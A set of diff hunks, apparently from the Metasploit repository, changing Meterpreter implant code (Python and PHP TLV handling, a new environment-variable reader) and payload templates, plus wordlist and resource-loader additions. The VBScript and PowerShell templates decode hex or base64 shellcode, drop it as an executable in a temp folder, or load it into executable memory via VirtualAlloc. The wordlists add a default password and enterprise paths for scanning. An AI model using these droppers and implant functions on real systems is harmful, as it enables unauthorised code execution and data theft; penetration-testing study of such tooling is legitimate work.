+TLV_TYPE_MAC_NAME              = TLV_META_TYPE_STRING  | 1432
+TLV_TYPE_NETWORK_INTERFACE     = TLV_META_TYPE_GROUP   | 1433

-TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
-TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
-TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
-TLV_TYPE_ROUTE_METRIC =        TLV_META_TYPE_UINT    | 1443
-TLV_TYPE_ADDR_TYPE =           TLV_META_TYPE_UINT    | 1444
+TLV_TYPE_SUBNET_STRING         = TLV_META_TYPE_STRING  | 1440
+TLV_TYPE_NETMASK_STRING        = TLV_META_TYPE_STRING  | 1441
+TLV_TYPE_GATEWAY_STRING        = TLV_META_TYPE_STRING  | 1442
+TLV_TYPE_ROUTE_METRIC          = TLV_META_TYPE_UINT    | 1443
+TLV_TYPE_ADDR_TYPE             = TLV_META_TYPE_UINT    | 1444

+##
 # Socket
-TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
-TLV_TYPE_PEER_PORT =           TLV_META_TYPE_UINT    | 1501
-TLV_TYPE_LOCAL_HOST =          TLV_META_TYPE_STRING  | 1502
-TLV_TYPE_LOCAL_PORT =          TLV_META_TYPE_UINT    | 1503
-TLV_TYPE_CONNECT_RETRIES =     TLV_META_TYPE_UINT    | 1504
+##
+TLV_TYPE_PEER_HOST             = TLV_META_TYPE_STRING  | 1500
+TLV_TYPE_PEER_PORT             = TLV_META_TYPE_UINT    | 1501
+TLV_TYPE_LOCAL_HOST            = TLV_META_TYPE_STRING  | 1502
+TLV_TYPE_LOCAL_PORT            = TLV_META_TYPE_UINT    | 1503
+TLV_TYPE_CONNECT_RETRIES       = TLV_META_TYPE_UINT    | 1504

-TLV_TYPE_SHUTDOWN_HOW =        TLV_META_TYPE_UINT    | 1530
+TLV_TYPE_SHUTDOWN_HOW          = TLV_META_TYPE_UINT    | 1530

+##
 # Registry
-TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
-TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
-TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
-TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
-TLV_TYPE_KEY_NAME           = TLV_META_TYPE_STRING  | 1003
-TLV_TYPE_VALUE_NAME         = TLV_META_TYPE_STRING  | 1010
-TLV_TYPE_VALUE_TYPE         = TLV_META_TYPE_UINT    | 1011
-TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
-TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
+##
+TLV_TYPE_HKEY                  = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_ROOT_KEY              = TLV_TYPE_HKEY
+TLV_TYPE_BASE_KEY              = TLV_META_TYPE_STRING  | 1001
+TLV_TYPE_PERMISSION            = TLV_META_TYPE_UINT    | 1002
+TLV_TYPE_KEY_NAME              = TLV_META_TYPE_STRING  | 1003
+TLV_TYPE_VALUE_NAME            = TLV_META_TYPE_STRING  | 1010
+TLV_TYPE_VALUE_TYPE            = TLV_META_TYPE_UINT    | 1011
+TLV_TYPE_VALUE_DATA            = TLV_META_TYPE_RAW     | 1012
+TLV_TYPE_TARGET_HOST           = TLV_META_TYPE_STRING  | 1013

+##
 # Config
-TLV_TYPE_COMPUTER_NAME =       TLV_META_TYPE_STRING  | 1040
-TLV_TYPE_OS_NAME =             TLV_META_TYPE_STRING  | 1041
-TLV_TYPE_USER_NAME =           TLV_META_TYPE_STRING  | 1042
-TLV_TYPE_ARCHITECTURE  =       TLV_META_TYPE_STRING  | 1043
+##
+TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING  | 1040
+TLV_TYPE_OS_NAME               = TLV_META_TYPE_STRING  | 1041
+TLV_TYPE_USER_NAME             = TLV_META_TYPE_STRING  | 1042
+TLV_TYPE_ARCHITECTURE          = TLV_META_TYPE_STRING  | 1043
+
+##
+# Environment
+##
+TLV_TYPE_ENV_VARIABLE          = TLV_META_TYPE_STRING  | 1100
+TLV_TYPE_ENV_VALUE             = TLV_META_TYPE_STRING  | 1101
+TLV_TYPE_ENV_GROUP             = TLV_META_TYPE_GROUP   | 1102

 DELETE_KEY_FLAG_RECURSIVE = (1 << 0)

+##
 # Process
-TLV_TYPE_BASE_ADDRESS =        TLV_META_TYPE_UINT    | 2000
-TLV_TYPE_ALLOCATION_TYPE =     TLV_META_TYPE_UINT    | 2001
-TLV_TYPE_PROTECTION =          TLV_META_TYPE_UINT    | 2002
-TLV_TYPE_PROCESS_PERMS =       TLV_META_TYPE_UINT    | 2003
-TLV_TYPE_PROCESS_MEMORY =      TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS =  TLV_META_TYPE_UINT    | 2005
-TLV_TYPE_MEMORY_STATE =        TLV_META_TYPE_UINT    | 2006
-TLV_TYPE_MEMORY_TYPE =         TLV_META_TYPE_UINT    | 2007
-TLV_TYPE_ALLOC_PROTECTION =    TLV_META_TYPE_UINT    | 2008
-TLV_TYPE_PID =                 TLV_META_TYPE_UINT    | 2300
-TLV_TYPE_PROCESS_NAME =        TLV_META_TYPE_STRING  | 2301
-TLV_TYPE_PROCESS_PATH =        TLV_META_TYPE_STRING  | 2302
-TLV_TYPE_PROCESS_GROUP =       TLV_META_TYPE_GROUP   | 2303
-TLV_TYPE_PROCESS_FLAGS =       TLV_META_TYPE_UINT    | 2304
-TLV_TYPE_PROCESS_ARGUMENTS =   TLV_META_TYPE_STRING  | 2305
-TLV_TYPE_PROCESS_ARCH =        TLV_META_TYPE_UINT    | 2306
-TLV_TYPE_PARENT_PID =          TLV_META_TYPE_UINT    | 2307
+##
+TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_ALLOCATION_TYPE       = TLV_META_TYPE_UINT    | 2001
+TLV_TYPE_PROTECTION            = TLV_META_TYPE_UINT    | 2002
+TLV_TYPE_PROCESS_PERMS         = TLV_META_TYPE_UINT    | 2003
+TLV_TYPE_PROCESS_MEMORY        = TLV_META_TYPE_RAW     | 2004
+TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_MEMORY_STATE          = TLV_META_TYPE_UINT    | 2006
+TLV_TYPE_MEMORY_TYPE           = TLV_META_TYPE_UINT    | 2007
+TLV_TYPE_ALLOC_PROTECTION      = TLV_META_TYPE_UINT    | 2008
+TLV_TYPE_PID                   = TLV_META_TYPE_UINT    | 2300
+TLV_TYPE_PROCESS_NAME          = TLV_META_TYPE_STRING  | 2301
+TLV_TYPE_PROCESS_PATH          = TLV_META_TYPE_STRING  | 2302
+TLV_TYPE_PROCESS_GROUP         = TLV_META_TYPE_GROUP   | 2303
+TLV_TYPE_PROCESS_FLAGS         = TLV_META_TYPE_UINT    | 2304
+TLV_TYPE_PROCESS_ARGUMENTS     = TLV_META_TYPE_STRING  | 2305
+TLV_TYPE_PROCESS_ARCH          = TLV_META_TYPE_UINT    | 2306
+TLV_TYPE_PARENT_PID            = TLV_META_TYPE_UINT    | 2307

-TLV_TYPE_IMAGE_FILE =          TLV_META_TYPE_STRING  | 2400
-TLV_TYPE_IMAGE_FILE_PATH =     TLV_META_TYPE_STRING  | 2401
-TLV_TYPE_PROCEDURE_NAME =      TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS =   TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE =          TLV_META_TYPE_UINT    | 2404
-TLV_TYPE_IMAGE_GROUP =         TLV_META_TYPE_GROUP   | 2405
-TLV_TYPE_IMAGE_NAME =          TLV_META_TYPE_STRING  | 2406
+TLV_TYPE_IMAGE_FILE            = TLV_META_TYPE_STRING  | 2400
+TLV_TYPE_IMAGE_FILE_PATH       = TLV_META_TYPE_STRING  | 2401
+TLV_TYPE_PROCEDURE_NAME        = TLV_META_TYPE_STRING  | 2402
+TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_UINT    | 2403
+TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_IMAGE_GROUP           = TLV_META_TYPE_GROUP   | 2405
+TLV_TYPE_IMAGE_NAME            = TLV_META_TYPE_STRING  | 2406

-TLV_TYPE_THREAD_ID =           TLV_META_TYPE_UINT    | 2500
-TLV_TYPE_THREAD_PERMS =        TLV_META_TYPE_UINT    | 2502
-TLV_TYPE_EXIT_CODE =           TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT =         TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER =     TLV_META_TYPE_UINT    | 2512
-TLV_TYPE_CREATION_FLAGS =      TLV_META_TYPE_UINT    | 2513
+TLV_TYPE_THREAD_ID             = TLV_META_TYPE_UINT    | 2500
+TLV_TYPE_THREAD_PERMS          = TLV_META_TYPE_UINT    | 2502
+TLV_TYPE_EXIT_CODE             = TLV_META_TYPE_UINT    | 2510
+TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_UINT    | 2511
+TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_CREATION_FLAGS        = TLV_META_TYPE_UINT    | 2513

-TLV_TYPE_REGISTER_NAME =       TLV_META_TYPE_STRING  | 2540
-TLV_TYPE_REGISTER_SIZE =       TLV_META_TYPE_UINT    | 2541
-TLV_TYPE_REGISTER_VALUE_32 =   TLV_META_TYPE_UINT    | 2542
-TLV_TYPE_REGISTER =            TLV_META_TYPE_GROUP   | 2550
+TLV_TYPE_REGISTER_NAME         = TLV_META_TYPE_STRING  | 2540
+TLV_TYPE_REGISTER_SIZE         = TLV_META_TYPE_UINT    | 2541
+TLV_TYPE_REGISTER_VALUE_32     = TLV_META_TYPE_UINT    | 2542
+TLV_TYPE_REGISTER              = TLV_META_TYPE_GROUP   | 2550

 ##
 # Ui
 ##
-TLV_TYPE_IDLE_TIME =           TLV_META_TYPE_UINT    | 3000
-TLV_TYPE_KEYS_DUMP =           TLV_META_TYPE_STRING  | 3001
-TLV_TYPE_DESKTOP =             TLV_META_TYPE_STRING  | 3002
+TLV_TYPE_IDLE_TIME             = TLV_META_TYPE_UINT    | 3000
+TLV_TYPE_KEYS_DUMP             = TLV_META_TYPE_STRING  | 3001
+TLV_TYPE_DESKTOP               = TLV_META_TYPE_STRING  | 3002

 ##
 # Event Log
 ##
-TLV_TYPE_EVENT_SOURCENAME =    TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE =        TLV_META_TYPE_UINT    | 4001
-TLV_TYPE_EVENT_NUMRECORDS =    TLV_META_TYPE_UINT    | 4002
+TLV_TYPE_EVENT_SOURCENAME      = TLV_META_TYPE_STRING  | 4000
+TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_NUMRECORDS      = TLV_META_TYPE_UINT    | 4002

-TLV_TYPE_EVENT_READFLAGS =     TLV_META_TYPE_UINT    | 4003
-TLV_TYPE_EVENT_RECORDOFFSET =  TLV_META_TYPE_UINT    | 4004
+TLV_TYPE_EVENT_READFLAGS       = TLV_META_TYPE_UINT    | 4003
+TLV_TYPE_EVENT_RECORDOFFSET    = TLV_META_TYPE_UINT    | 4004

-TLV_TYPE_EVENT_RECORDNUMBER =  TLV_META_TYPE_UINT    | 4006
-TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT    | 4007
-TLV_TYPE_EVENT_TIMEWRITTEN =   TLV_META_TYPE_UINT    | 4008
-TLV_TYPE_EVENT_ID =            TLV_META_TYPE_UINT    | 4009
-TLV_TYPE_EVENT_TYPE =          TLV_META_TYPE_UINT    | 4010
-TLV_TYPE_EVENT_CATEGORY =      TLV_META_TYPE_UINT    | 4011
-TLV_TYPE_EVENT_STRING =        TLV_META_TYPE_STRING  | 4012
-TLV_TYPE_EVENT_DATA =          TLV_META_TYPE_RAW     | 4013
+TLV_TYPE_EVENT_RECORDNUMBER    = TLV_META_TYPE_UINT    | 4006
+TLV_TYPE_EVENT_TIMEGENERATED   = TLV_META_TYPE_UINT    | 4007
+TLV_TYPE_EVENT_TIMEWRITTEN     = TLV_META_TYPE_UINT    | 4008
+TLV_TYPE_EVENT_ID              = TLV_META_TYPE_UINT    | 4009
+TLV_TYPE_EVENT_TYPE            = TLV_META_TYPE_UINT    | 4010
+TLV_TYPE_EVENT_CATEGORY        = TLV_META_TYPE_UINT    | 4011
+TLV_TYPE_EVENT_STRING          = TLV_META_TYPE_STRING  | 4012
+TLV_TYPE_EVENT_DATA            = TLV_META_TYPE_RAW     | 4013

 ##
 # Power
 ##
-TLV_TYPE_POWER_FLAGS =         TLV_META_TYPE_UINT    | 4100
-TLV_TYPE_POWER_REASON =        TLV_META_TYPE_UINT    | 4101
+TLV_TYPE_POWER_FLAGS           = TLV_META_TYPE_UINT    | 4100
+TLV_TYPE_POWER_REASON          = TLV_META_TYPE_UINT    | 4101

 ##
 # Sys
@@ -367,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
 	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
 	return ERROR_SUCCESS, response

+@meterpreter.register_function
+def stdapi_sys_config_getenv(request, response):
+	for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
+		pgroup = ''
+		env_var = env_var['value'].translate(None, '%$')
+		env_val = os.environ.get(env_var)
+		if env_val:
+			pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
+			pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
+			response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
@meterpreter.register_function
 def stdapi_sys_config_sysinfo(request, response):
 	uname_info = platform.uname()
@@ -680,6 +680,30 @@ function tlv_pack($tlv) {
    return $ret;
 }

+function tlv_unpack($raw_tlv) {
+    $tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
+    $type = $tlv['type'];
+    my_print("len: {$tlv['len']}, type: {$tlv['type']}");
+    if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
+        $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
+    }
+    elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
+        $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
+    }
+    elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
+        $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
+    }
+    elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
+        $tlv = unpack("Nlen/Ntype", $raw_tlv);
+        $tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
+    }
+    else {
+        my_print("Wtf type is this? $type");
+        $tlv = null;
+    }
+    return $tlv;
+}
+
 function packet_add_tlv(&$pkt, $tlv) {
    $pkt .= tlv_pack($tlv);
 }
@@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) {
    # Start at offset 8 to skip past the packet header
    $offset = 8;
    while ($offset < strlen($pkt)) {
-        $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
+        $tlv = tlv_unpack(substr($pkt, $offset));
        #my_print("len: {$tlv['len']}, type: {$tlv['type']}");
        if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
            #my_print("Found one at offset $offset");
-            if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
-                $tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
-            }
-            elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
-                $tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
-            }
-            elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
-                $tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
-            }
-            elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
-                $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
-                $tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
-            }
-            else {
-                my_print("Wtf type is this? $type");
-                $tlv = null;
-            }
            return $tlv;
        }
        $offset += $tlv['len'];
@@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) {
 }


+function packet_get_all_tlvs($pkt, $type) {
+    my_print("Looking for all tlvs of type $type");
+    # Start at offset 8 to skip past the packet header
+    $offset = 8;
+    $all = array();
+    while ($offset < strlen($pkt)) {
+        $tlv = tlv_unpack(substr($pkt, $offset));
+        if ($tlv == NULL) {
+            break;
+        }
+        my_print("len: {$tlv['len']}, type: {$tlv['type']}");
+        if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
+            my_print("Found one at offset $offset");
+            array_push($all, $tlv);
+        }
+        $offset += $tlv['len'];
+    }
+    return $all;
+}
+
+
 ##
 # Functions for genericizing the stream/socket conundrum
 ##
@@ -1,13 +0,0 @@
-K 10
-ascii_cert
-V 1844
-MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
-K 8
-failures
-V 1
-8
-K 15
-svn:realmstring
-V 26
-https://metasploit.com:443
-END
@@ -1,13 +0,0 @@
-K 10
-ascii_cert
-V 1844
-MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
-K 8
-failures
-V 1
-8
-K 15
-svn:realmstring
-V 30
-https://www.metasploit.com:443
-END
@@ -1,5 +1,5 @@
 Function %{var_func}()
-%{var_shellcode}
+	%{var_shellcode} = "%{hex_shellcode}"

 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@@ -10,9 +10,11 @@ Function %{var_func}()
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
-	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
 	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	%{var_stream}.Write %{var_bytes}
+	For i = 1 to Len(%{var_shellcode}) Step 2
+	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
+	Next
 	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
@@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
 $%{var_compileParams}.GenerateInMemory = $True
 $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})

-%{shellcode}
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")

 $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
 if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
@@ -1,5 +1,6 @@
 aspnet_client/
 Autodiscover/
+exchange/
 ecp/
 EWS/
 Microsoft-Server-ActiveSync/
@@ -1,3 +1,4 @@
+/AdapterFramework/version/version.jsp
 /AdobeDocumentServices/Config
 /AdobeDocumentServices/Config?wsdl
 /AE/index.jsp
@@ -319,6 +320,7 @@
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
+/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
 /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
 /webdynpro/dispatcher/sap.com/tc~wd~tools
 /webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
@@ -92,6 +92,7 @@ root
 router
 rw
 rwa
+s!a@m#n$p%c
 san-fran
 sanfran
 scotty
@@ -0,0 +1,89 @@
+/*!
+ * @file ResourceLoader.c
+ * @brief Helper functions for loading embedded resources.
+ */
+#include <Windows.h>
+#include "common.h"
+
+/*!
+ * @brief Load a resource from the given module as a raw array of bytes.
+ * @param hModule Handle to the module containing the resource.
+ * @param uResourceId ID of the resource to load.
+ * @param lpType The type of resource being loaded.
+ * @param pBuffer Pointer to the buffer that will receive the loaded resource.
+ * @param pBufferSize Pointer to the variable that will receive the size of \c pBuffer.
+ * @returns Indication of success or failure.
+ */
+DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize)
+{
+	DWORD dwResult = FALSE;
+	DWORD dwResourceSize = 0;
+	LPBYTE pResource = NULL;
+	HRSRC hResource = NULL;
+	HGLOBAL hResData = NULL;
+	LPVOID lpResData = NULL;
+
+	*pBuffer = NULL;
+	*pBufferSize = 0;
+
+	do
+	{
+		if ((hResource = FindResourceA(hModule, MAKEINTRESOURCEA(uResourceId), lpType)) == NULL) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to find resource %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		if ((dwResourceSize = SizeofResource(hModule, hResource)) == 0) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to find resource size for %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		if ((pResource = (LPBYTE)malloc(dwResourceSize)) == NULL) {
+			dwResult = ERROR_NOT_ENOUGH_MEMORY;
+			dprintf("[RES] Unable to allocate memory for resource %d type %s size %u", uResourceId, lpType, dwResourceSize);
+			break;
+		}
+
+		if ((hResData = LoadResource(hModule, hResource)) == NULL) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to load resource for %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		if ((lpResData = LockResource(hResData)) == NULL) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to lock resource for %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		memcpy_s(pResource, dwResourceSize, lpResData, dwResourceSize);
+
+		// Locked resource don't need to be unlocked. If we get here, we've won!
+		dwResult = ERROR_SUCCESS;
+		*pBuffer = lpResData;
+		*pBufferSize = dwResourceSize;
+
+	} while (0);
+
+	if (dwResult != ERROR_SUCCESS && pResource != NULL) {
+		free(pResource);
+	}
+
+	return dwResult;
+}
+
